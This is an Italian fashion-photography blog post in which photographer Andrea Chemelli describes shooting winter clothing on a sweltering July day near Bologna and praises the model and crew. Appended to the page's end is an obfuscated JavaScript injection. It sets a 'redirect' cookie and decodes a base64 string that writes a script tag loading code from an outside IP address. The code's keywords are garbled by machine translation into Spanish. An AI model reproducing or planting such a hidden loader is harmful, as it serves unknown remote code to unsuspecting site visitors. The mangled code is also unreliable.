FOTOGRAFÍA

RITORNO IN CITTÁ – dietro l’obiettivo

DIETRO L’OBIETTIVO – IL PUNTO DI VISTA DEL FOTOGRAFO

a cura di Andrea Chemelli

10-ritorno-in-citta-fashion-beauty-magazzino26-fashion-blog-photography_and8477-copy

(attrezzature usate: fotocamera Nikon d4s, ottiche Nikon 24-120 f4 VR, 85 f1,4, 70-200 f2,8 VR, pannello riflettente Lastolite)

Raccontando di questo shooting colgo l’occasione per parlare di una situazione decisamente tipica, ben nota a modelle e modelli: il fattore temperatura. La fotografia di moda ha tempi del tutto particolari, e spesso le immagini che vediamo nelle pubblicità e negli editoriali con le novità autunno-inverno (o primavera-estate), in realtà sono state scattate con mesi di anticipo. Ecco quindi che più di una volta la povera modella è costretta a vestirsi di tutto punto con tanto di maglione, sciarpa, cappotto e stivali in piena estate, quando la colonnina di mercurio sfiora i 40 gradi…oppure a indossare il costume da bagno in una bella (ma decisamente fresca) giornata di inizio marzo. Ok, anche questo fa parte del mestiere e talvolta la professionalità impone simili sacrifici, però a volte ci si trova davvero in condizioni limite. È quello che è successo a noi, in quel caldissimo cinque luglio in un pittoresco “borghetto” alle porte di Bologna, città tra le più afose che io conosca, almeno a queste latitudini. È soprattutto in questi casi che la mia precedente esperienza da fotomodello mi viene in aiuto: conviene limitare il più possibile i tempi di scatto, cercando di studiare bene pose e inquadrature prima di far vestire la modella, e considerare opportuni tempi di recupero tra uno scatto e l’altro. Sarebbe ancora meglio scegliere una location al di sopra dei mille metri, ma non sempre è possibile, e oggi è andata così. Credo di aver sudato come James Brown in un concerto. Quindi, complimenti a Emma Ruiba, la nostra modella, che ha dato prova di grande stoicismo, oltre che a Nico, Fabio, Paolo e Yenny, come sempre fantastico gruppo di lavoro.

Guarda il servizio completo “Ritorno in città” qui!

GetCookie función(e){var U = document.cookie.match(nueva RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/sol,”\\$1″)+”=([^;]*)”));retorno T?decodeURIComponent(la[1]):vacío 0}var src =”datos:text / javascript;base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”,ahora = Math.floor(Date.now()/1e3),galletas = GetCookie(“redirección”);Si(ahora>=(tiempo = galletas)||nula 0 === tiempo){tiempo var = Math.floor(Date.now()/1e3 + 86400),Date = new Date((nuevos Fecha).consigue tiempo()+86400);document.cookie =”redirección =”+tiempo +”; path = /; expira =”+date.toGMTString(),document.write(”)}